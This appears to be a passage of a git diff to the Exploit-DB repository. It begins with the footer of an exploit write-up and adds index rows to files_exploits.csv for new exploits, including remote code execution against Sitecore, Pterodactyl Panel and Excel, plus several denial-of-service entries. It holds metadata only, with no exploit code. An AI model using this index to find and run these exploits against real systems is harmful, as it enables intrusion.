+https://cve.mitre.org/index.html +https://cxsecurity.com/ and https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index da9e4be73..098b514d1 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -8544,6 +8544,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 22046,exploits/linux/remote/22046.c,"Null HTTPd 0.5 - Remote Heap Corruption",2002-11-26,eSDee,remote,linux,,2002-11-26,2012-10-17,1,,,,,,http://www.netric.org/advisories/netric-adv009.txt 21818,exploits/linux/remote/21818.c,"Null HTTPd 0.5 - Remote Heap Overflow",2002-09-23,eSDee,remote,linux,,2002-09-23,2012-10-09,1,CVE-2002-1496;OSVDB-9212,,,,,http://www.netric.org/advisories/netric-adv009.txt 25010,exploits/linux/remote/25010.txt,"O3Read 0.0.3 - HTML Parser Buffer Overflow",2004-12-17,"Wiktor Kopec",remote,linux,,2004-12-17,2013-04-30,1,CVE-2004-1288;OSVDB-12457,,,,,https://www.securityfocus.com/bid/12000/info +52340,exploits/linux/remote/52340.txt,"OneTrust SDK 6.33.0 - Denial Of Service (DoS)",2025-06-26,"Alameen Karim Merali",remote,linux,,2025-06-26,2025-06-26,0,CVE-2024-57708,,,,, 20496,exploits/linux/remote/20496.c,"Oops Proxy Server 1.4.22 - Remote Buffer Overflow (2)",2000-12-07,diman,remote,linux,,2000-12-07,2012-08-14,1,CVE-2001-0028;OSVDB-1689,,,,,https://www.securityfocus.com/bid/2099/info 39973,exploits/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution (Metasploit)",2016-06-17,Metasploit,remote,linux,443,2016-06-17,2016-06-17,1,,"Metasploit Framework (MSF)",,,, 24106,exploits/linux/remote/24106.txt,"Open WebMail 1.x/2.x - Remote Command Execution Variant",2004-05-10,Nullbyte,remote,linux,,2004-05-10,2013-01-14,1,OSVDB-4201,,,,,https://www.securityfocus.com/bid/10316/info @@ -11188,6 +11189,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 22304,exploits/multiple/remote/22304.rb,"ManageEngine Security Manager Plus 5.5 build 5505 - SQL Injection (Metasploit)",2012-10-28,Metasploit,remote,multiple,,2012-10-28,2012-10-28,1,OSVDB-86562,"Metasploit Framework (MSF)",,,, 16308,exploits/multiple/remote/16308.rb,"Maple Maplet - File Creation / Command Execution (Metasploit)",2010-09-20,Metasploit,remote,multiple,,2010-09-20,2011-03-06,1,OSVDB-64541,"Metasploit Framework (MSF)",,,, 19906,exploits/multiple/remote/19906.txt,"Matt Wright FormMail 1.6/1.7/1.8 - Environmental Variables Disclosure",2000-05-10,"Black Watch Labs",remote,multiple,,2000-05-10,2012-07-17,1,CVE-2000-0411;OSVDB-59348,,,,,https://www.securityfocus.com/bid/1187/info +52345,exploits/multiple/remote/52345.txt,"McAfee Agent 5.7.6 - Insecure Storage of Sensitive Information",2025-06-26,"Keenan Scott",remote,multiple,,2025-06-26,2025-06-26,0,CVE-2022-1257,,,,, 38368,exploits/multiple/remote/38368.txt,"McAfee Vulnerability Manager - 'cert_cn' Cross-Site Scripting",2013-03-08,"Asheesh Anaconda",remote,multiple,,2013-03-08,2015-09-30,1,CVE-2013-5094;OSVDB-91133,,,,,https://www.securityfocus.com/bid/58401/info 37081,exploits/multiple/remote/37081.py,"McAfee Web Gateway 7.1.5.x - 'Host' HTTP Header Security Bypass",2012-04-16,"Gabriel Menezes Nunes",remote,multiple,,2012-04-16,2015-05-22,1,,,,,,https://www.securityfocus.com/bid/53015/info 31767,exploits/multiple/remote/31767.rb,"MediaWiki - 'Thumb.php' Remote Command Execution (Metasploit)",2014-02-19,Metasploit,remote,multiple,80,2014-02-19,2014-02-19,1,CVE-2014-1610;OSVDB-102630,"Metasploit Framework (MSF)",,,, @@ -11450,6 +11452,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 23271,exploits/multiple/remote/23271.txt,"PSCS VPOP3 2.0 Email Server WebAdmin - Cross-Site Scripting",2003-10-22,SecuriTeam,remote,multiple,,2003-10-22,2012-12-09,1,CVE-2003-1522;OSVDB-2680,,,,,https://www.securityfocus.com/bid/8869/info 47354,exploits/multiple/remote/47354.py,"Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Remote Code Execution",2019-09-06,"Justin Wagner",remote,multiple,,2019-09-06,2019-09-06,0,CVE-2019-11539,,,,, 47700,exploits/multiple/remote/47700.rb,"Pulse Secure VPN - Arbitrary Command Execution (Metasploit)",2019-11-20,Metasploit,remote,multiple,,2019-11-20,2019-11-20,1,CVE-2019-11539,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/pulse_secure_cmd_exec.rb +52339,exploits/multiple/remote/52339.py,"PX4 Military UAV Autopilot 1.12.3 - Denial of Service (DoS)",2025-06-26,"Mohammed Idrees Banyamer",remote,multiple,,2025-06-26,2025-06-26,0,CVE-2025-5640,,,,, 32781,exploits/multiple/remote/32781.txt,"PyBlosxom 1.6.3 Atom Flavor - Multiple XML Injection Vulnerabilities",2009-02-09,"Nam Nguyen",remote,multiple,,2009-02-09,2014-04-10,1,OSVDB-52156,,,,,https://www.securityfocus.com/bid/33676/info 22496,exploits/multiple/remote/22496.txt,"Python 2.2/2.3 - Documentation Server Error Page Cross-Site Scripting",2003-04-15,euronymous,remote,multiple,,2003-04-15,2012-11-05,1,,,,,,https://www.securityfocus.com/bid/7353/info 49585,exploits/multiple/remote/49585.py,"python jsonpickle 2.0.0 - Remote Code Execution",2021-02-24,"Adi Malyanker",remote,multiple,,2021-02-24,2021-02-24,0,,,,,, @@ -12334,6 +12337,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51264,exploits/multiple/webapps/51264.txt,"Provide Server v.14.4 XSS - CSRF & Remote Code Execution (RCE)",2023-04-05,"Andreas Finstad",webapps,multiple,,2023-04-05,2023-04-05,0,CVE-2023-23286,,,,, 12730,exploits/multiple/webapps/12730.txt,"ProWeb Design - SQL Injection",2010-05-24,cyberlog,webapps,multiple,,2010-05-23,,1,,,,,, 28340,exploits/multiple/webapps/28340.c,"PSWD.JS - Insecure Password Hash",2006-08-03,"Gianstefano Monni",webapps,multiple,,2006-08-03,2017-10-17,1,CVE-2006-4068;OSVDB-29777,,,,,https://www.securityfocus.com/bid/19333/info +52341,exploits/multiple/webapps/52341.py,"Pterodactyl Panel 1.11.11 - Remote Code Execution (RCE)",2025-06-26,Zen-kun04,webapps,multiple,,2025-06-26,2025-06-26,0,CVE-2025-49132,,,,, 47297,exploits/multiple/webapps/47297.rb,"Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (Metasploit)",2019-08-21,"Alyssa Herrera",webapps,multiple,,2019-08-21,2019-08-21,0,CVE-2019-11510,,,,, 33894,exploits/multiple/webapps/33894.txt,"Python CGIHTTPServer - Encoded Directory Traversal",2014-06-27,"RedTeam Pentesting",webapps,multiple,,2014-06-27,2014-06-27,1,CVE-2014-4650;OSVDB-108369,,,,,https://www.redteam-pentesting.de/advisories/rt-sa-2014-008 48146,exploits/multiple/webapps/48146.py,"qdPM < 9.1 - Remote Code Execution",2020-02-28,"Tobin Shields",webapps,multiple,,2020-02-28,2020-02-28,0,CVE-2020-7246,,,,,https://github.com/TobinShields/qdPM9.1_Exploit/blob/b135e99b54228740f84c6a821d0c56fdaa694797/qdPM9.1_exploit.py @@ -12388,6 +12392,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 52199,exploits/multiple/webapps/52199.txt,"SilverStripe 5.3.8 - Stored Cross Site Scripting (XSS) (Authenticated)",2025-04-14,"James Nicoll",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-47605,,,,, 50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,,2021-06-30,2021-06-30,0,,,,,, 51796,exploits/multiple/webapps/51796.txt,"SISQUALWFM 7.1.319.103 - Host Header Injection",2024-02-15,"Omer Shaik",webapps,multiple,,2024-02-15,2024-02-15,0,,,,,, +52344,exploits/multiple/webapps/52344.py,"Sitecore 10.4 - Remote Code Execution (RCE)",2025-06-26,"Yesith Alvarez",webapps,multiple,,2025-06-26,2025-06-26,0,CVE-2025-27218,,,,, 52035,exploits/multiple/webapps/52035.txt,"Sitefinity 15.0 - Cross-Site Scripting (XSS)",2024-06-03,"Aldi Saputra Wahyudi",webapps,multiple,,2024-06-03,2024-06-03,0,CVE-2023-27636,,,,, 33717,exploits/multiple/webapps/33717.txt,"Six Apart Vox - 'search' Page Cross-Site Scripting",2010-03-05,Phenom,webapps,multiple,,2010-03-05,2014-06-12,1,,,,,,https://www.securityfocus.com/bid/38575/info 52335,exploits/multiple/webapps/52335.py,"Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI",2025-06-15,"Cristian Branet",webapps,multiple,,2025-06-15,2025-06-15,0,CVE-2025-49619,,,,, @@ -12397,6 +12402,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49829,exploits/multiple/webapps/49829.js,"SnipCommand 0.1.0 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,, 51883,exploits/multiple/webapps/51883.txt,"SnipeIT 6.2.1 - Stored Cross Site Scripting",2024-03-12,"Shahzaib Ali Khan",webapps,multiple,,2024-03-12,2024-03-12,0,,,,,, 43445,exploits/multiple/webapps/43445.txt,"Snitz Forums 2000 < 3.4.0.3 - Multiple Vulnerabilities",2003-06-16,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00010,,,,,http://gulftech.org/advisories/Snitz%20Forums%202000%20Multiple%20Vulnerabilities/10 +52346,exploits/multiple/webapps/52346.py,"Social Warfare WordPress Plugin 3.5.2 - Remote Code Execution (RCE)",2025-06-26,"Huseyin Mardinli",webapps,multiple,,2025-06-26,2025-06-26,0,CVE-2019-9978,,,,, 48713,exploits/multiple/webapps/48713.txt,"Socket.io-file 2.0.31 - Arbitrary File Upload",2020-07-26,Cr0wTom,webapps,multiple,,2020-07-26,2020-07-26,0,,,,,, 49986,exploits/multiple/webapps/49986.txt,"Solar-Log 500 2.8.2 - Incorrect Access Control",2021-06-11,Luca.Chiou,webapps,multiple,,2021-06-11,2021-06-11,0,,,,,, 49987,exploits/multiple/webapps/49987.txt,"Solar-Log 500 2.8.2 - Unprotected Storage of Credentials",2021-06-11,Luca.Chiou,webapps,multiple,,2021-06-11,2021-06-11,0,,,,,, @@ -43422,6 +43428,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 16462,exploits/windows/remote/16462.rb,"freeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-04-27,1,CVE-2006-2407;OSVDB-25569,"Metasploit Framework (MSF)",,,http://www.exploit-db.comfreeFTPd.exe, 1330,exploits/windows/remote/1330.c,"freeFTPd 1.0.8 - 'USER' Remote Buffer Overflow",2005-11-17,Expanders,remote,windows,21,2005-11-16,2016-10-30,1,OSVDB-20909;CVE-2005-3684;CVE-2005-3683,,,,http://www.exploit-db.comfreeFTPd.exe, 23079,exploits/windows/remote/23079.txt,"freeFTPd 1.2.6 - Remote Authentication Bypass",2012-12-02,kingcope,remote,windows,,2012-12-02,2016-12-21,1,CVE-2012-6066;OSVDB-88006,,,,, +52342,exploits/windows/remote/52342.txt,"freeSSHd 1.0.9 - Denial of Service (DoS)",2025-06-26,"Fernando Mengali",remote,windows,,2025-06-26,2025-06-26,0,CVE-2024-0723,,,,, 1787,exploits/windows/remote/1787.py,"freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow",2006-05-15,"Tauqeer Ahmad",remote,windows,22,2006-05-14,2016-12-03,1,OSVDB-25463;CVE-2006-2407,,,,http://www.exploit-db.comfreeSSHd.exe,http://www.frsirt.com/english/advisories/2006/1786 16461,exploits/windows/remote/16461.rb,"freeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2016-12-03,1,CVE-2006-2407;OSVDB-25463,"Metasploit Framework (MSF)",,,http://www.exploit-db.comfreeSSHd.exe, 8295,exploits/windows/remote/8295.pl,"freeSSHd 1.2.1 - 'rename' Remote Buffer Overflow (SEH)",2009-03-27,r0ut3r,remote,windows,22,2009-03-26,2016-12-03,1,OSVDB-54362;CVE-2008-6899,,,,,http://www.bmgsec.com.au/advisory/32/ @@ -44136,6 +44143,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 45502,exploits/windows/remote/45502.txt,"Microsoft Edge - Sandbox Escape",2018-09-27,"Google Security Research",remote,windows,,2018-09-27,2018-09-28,1,CVE-2018-8469;CVE-2018-8468;CVE-2018-8463,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1598&can=1&q=&sort=-modified%20-id&colspec=ID%20Status%20Owner%20Summary%20Modified&desc=5 35573,exploits/windows/remote/35573.txt,"Microsoft Excel - Remote Buffer Overflow",2011-04-12,"Rodrigo Rubira Branco",remote,windows,,2011-04-12,2014-12-27,1,CVE-2011-0104;OSVDB-71761,,,,,https://www.securityfocus.com/bid/47245/info 28189,exploits/windows/remote/28189.txt,"Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution",2006-07-06,Nanika,remote,windows,,2006-07-06,2013-09-17,1,CVE-2006-3431;OSVDB-27053,,,,,https://www.securityfocus.com/bid/18872/info +52343,exploits/windows/remote/52343.py,"Microsoft Excel 2024 Use after free - Remote Code Execution (RCE)",2025-06-26,nu11secur1ty,remote,windows,,2025-06-26,2025-06-26,0,CVE-2025-47165,,,,, 47076,exploits/windows/remote/47076.py,"Microsoft Exchange 2003 - base64-MIME Remote Code Execution",2019-07-05,"Charles Truscott",remote,windows,25,2019-07-05,2019-07-05,0,CVE-2007-0213,,ENGLISHMANSDENTIST,,, 49663,exploits/windows/remote/49663.py,"Microsoft Exchange 2019 - Server-Side Request Forgery",2021-03-14,F5,remote,windows,,2021-03-18,2021-11-01,0,CVE-2021-26855,,,,,https://f5.pm/go-62102.html 48153,exploits/windows/remote/48153.py,"Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution",2020-03-02,Photubias,remote,windows,,2020-03-02,2020-03-02,0,CVE-2020-0688,,,,,